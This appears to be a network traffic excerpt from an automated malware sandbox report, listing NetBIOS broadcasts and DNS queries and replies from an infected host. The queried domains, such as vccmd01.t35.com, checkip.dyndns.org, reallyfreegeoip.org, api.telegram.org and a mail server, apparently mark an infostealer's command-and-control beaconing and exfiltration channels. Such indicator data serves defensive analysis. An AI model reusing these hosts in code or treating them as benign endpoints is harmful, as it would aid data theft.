                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:53.799762011 CET53522961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:54.379815102 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:55.145435095 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:58.151031971 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:58.151031971 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:58.911046028 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:59.189383984 CET5541353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:59.197417021 CET53554131.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:59.661046982 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:01.411134958 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:01.411318064 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:02.163324118 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:02.926671028 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.406259060 CET6522153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.494157076 CET53652211.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.692651987 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.692730904 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:05.442313910 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:06.211359978 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:07.977817059 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:08.739368916 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:09.489192963 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:11.314239025 CET5011753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:11.403155088 CET53501171.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:12.490472078 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:12.490859032 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:13.254837990 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:14.023253918 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:15.801779032 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:15.801870108 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:16.551693916 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:16.691361904 CET6477953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:16.699156046 CET53647791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:17.317358017 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:19.083058119 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:19.083058119 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:19.832963943 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:20.598568916 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.345129013 CET6138053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.364231110 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.437026978 CET53613801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:23.114201069 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:23.864233971 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:27.519659996 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:27.519706964 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:28.127891064 CET5885953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:28.217782021 CET53588591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:28.271055937 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:29.036060095 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:30.817356110 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:30.817395926 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:31.582943916 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:32.333070040 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:33.526981115 CET5107653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:33.534872055 CET53510761.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:34.099562883 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:34.099652052 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:34.864188910 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:35.629945040 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:37.488724947 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:38.239231110 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:38.904863119 CET6012253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:38.989212036 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:38.996296883 CET53601221.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:42.063981056 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:42.064090014 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:42.817368031 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:43.567378998 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:44.604074001 CET5340953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:44.612570047 CET53534091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:45.354444027 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:45.354444027 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:46.098589897 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:46.864217043 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:48.630832911 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:48.630934954 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:49.379983902 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:50.129863024 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:50.163337946 CET5122453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:50.250904083 CET53512241.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:51.896145105 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:52.663109064 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:53.426794052 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:55.687036037 CET5204953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:55.695785046 CET53520491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:56.404167891 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:56.404329062 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:57.161108971 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:57.913099051 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:59.691180944 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:59.691230059 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:00.426723003 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:00.962342024 CET5883553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:01.176733971 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:01.213273048 CET53588351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:03.041879892 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:03.042009115 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:03.801739931 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:04.567378044 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:06.755567074 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:07.202555895 CET6086153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:07.212618113 CET53608611.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:07.520466089 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:08.270472050 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:11.051297903 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:11.053113937 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:11.801728964 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:12.551806927 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:12.641931057 CET6465953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:12.731012106 CET53646591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:14.333139896 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:14.333219051 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:15.082979918 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:15.832979918 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:17.598651886 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:17.598745108 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:18.308389902 CET5634553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:18.351135015 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:18.397253036 CET53563451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:19.098601103 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:20.877481937 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:21.629857063 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:22.379991055 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:23.950151920 CET4923953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:23.958632946 CET53492391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:25.597912073 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:25.597986937 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:26.348752975 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:27.098613024 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:28.848700047 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:28.848700047 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:29.191298962 CET4936953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:29.574548006 CET53493691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:29.614244938 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:30.379868031 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:32.161262989 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:32.161263943 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:32.913152933 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:33.676876068 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:35.045613050 CET6148953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:35.134089947 CET53614891.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:35.442720890 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:36.208034992 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:36.973793983 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:39.457432032 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:39.457479000 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:40.207978964 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:40.751581907 CET5174353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:40.959162951 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:41.238910913 CET53517431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:41.951184034 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:42.723716974 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:42.723790884 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:43.475172997 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:44.239238024 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:45.989319086 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:45.989411116 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:46.754872084 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:47.141391039 CET5325553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:47.149904966 CET53532551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:47.504995108 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:49.273191929 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:50.020498037 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:50.786104918 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.507941008 CET5161653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.595525026 CET53516161.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.130806923 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.130884886 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:53.897207975 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:54.661111116 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.427107096 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:56.427206039 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.177189112 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.942389011 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.957179070 CET6327953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.126013041 CET53632791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.723761082 CET138138192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:59.723761082 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:00.489238024 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:01.254868031 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:03.021019936 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:03.789211035 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    Oct 29, 2024 13:12:04.536098003 CET137137192.168.2.5192.168.2.255
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.120920897 CET192.168.2.51.1.1.10x63cfStandard query (0)vccmd01.googlecode.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.551199913 CET192.168.2.51.1.1.10x26a0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.160613060 CET192.168.2.51.1.1.10x808fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.821377039 CET192.168.2.51.1.1.10xe39Standard query (0)vccmd02.googlecode.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.657756090 CET192.168.2.51.1.1.10xf414Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.682634115 CET192.168.2.51.1.1.10xded5Standard query (0)vccmd03.googlecode.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.087328911 CET192.168.2.51.1.1.10xc74fStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.455091953 CET192.168.2.51.1.1.10xd131Standard query (0)vccmd01.zxq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:09.700433969 CET192.168.2.51.1.1.10xee91Standard query (0)zxq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:17.716428041 CET192.168.2.51.1.1.10xb3c9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.610840082 CET192.168.2.51.1.1.10xf43fStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:26.321055889 CET192.168.2.51.1.1.10xc898Standard query (0)mail.tlakovec.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.348097086 CET192.168.2.51.1.1.10x8edStandard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.652488947 CET192.168.2.51.1.1.10x895bStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:47.339847088 CET192.168.2.51.1.1.10x3d52Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.747935057 CET192.168.2.51.1.1.10x767eStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:06.159327984 CET192.168.2.51.1.1.10xf5e1Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:13.157568932 CET192.168.2.51.1.1.10xf886Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:19.316895008 CET192.168.2.51.1.1.10xdc00Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.421792030 CET192.168.2.51.1.1.10xc499Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:31.047224045 CET192.168.2.51.1.1.10x821dStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:36.188956022 CET192.168.2.51.1.1.10x12e0Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:41.555084944 CET192.168.2.51.1.1.10x2faeStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.249954939 CET192.168.2.51.1.1.10x9a22Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:53.710174084 CET192.168.2.51.1.1.10x1a38Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:59.189383984 CET192.168.2.51.1.1.10x9c83Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.406259060 CET192.168.2.51.1.1.10x4a43Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:11.314239025 CET192.168.2.51.1.1.10x1e57Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:16.691361904 CET192.168.2.51.1.1.10x7110Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.345129013 CET192.168.2.51.1.1.10x7129Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:28.127891064 CET192.168.2.51.1.1.10xb7bcStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:33.526981115 CET192.168.2.51.1.1.10x134dStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:38.904863119 CET192.168.2.51.1.1.10xb05dStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:44.604074001 CET192.168.2.51.1.1.10x1f0fStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:50.163337946 CET192.168.2.51.1.1.10xfecbStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:55.687036037 CET192.168.2.51.1.1.10x99f2Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:00.962342024 CET192.168.2.51.1.1.10xac87Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:07.202555895 CET192.168.2.51.1.1.10x95d1Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:12.641931057 CET192.168.2.51.1.1.10x27f2Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:18.308389902 CET192.168.2.51.1.1.10xb001Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:23.950151920 CET192.168.2.51.1.1.10x1eeStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:29.191298962 CET192.168.2.51.1.1.10x7db7Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:35.045613050 CET192.168.2.51.1.1.10x33e7Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:40.751581907 CET192.168.2.51.1.1.10x6767Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:47.141391039 CET192.168.2.51.1.1.10xc902Standard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.507941008 CET192.168.2.51.1.1.10x123cStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:57.957179070 CET192.168.2.51.1.1.10x34cdStandard query (0)vccmd01.t35.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.146590948 CET1.1.1.1192.168.2.50x63cfNo error (0)vccmd01.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.146590948 CET1.1.1.1192.168.2.50x63cfNo error (0)googlecode.l.googleusercontent.com64.233.166.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.559124947 CET1.1.1.1192.168.2.50x26a0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.559124947 CET1.1.1.1192.168.2.50x26a0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.559124947 CET1.1.1.1192.168.2.50x26a0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.559124947 CET1.1.1.1192.168.2.50x26a0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
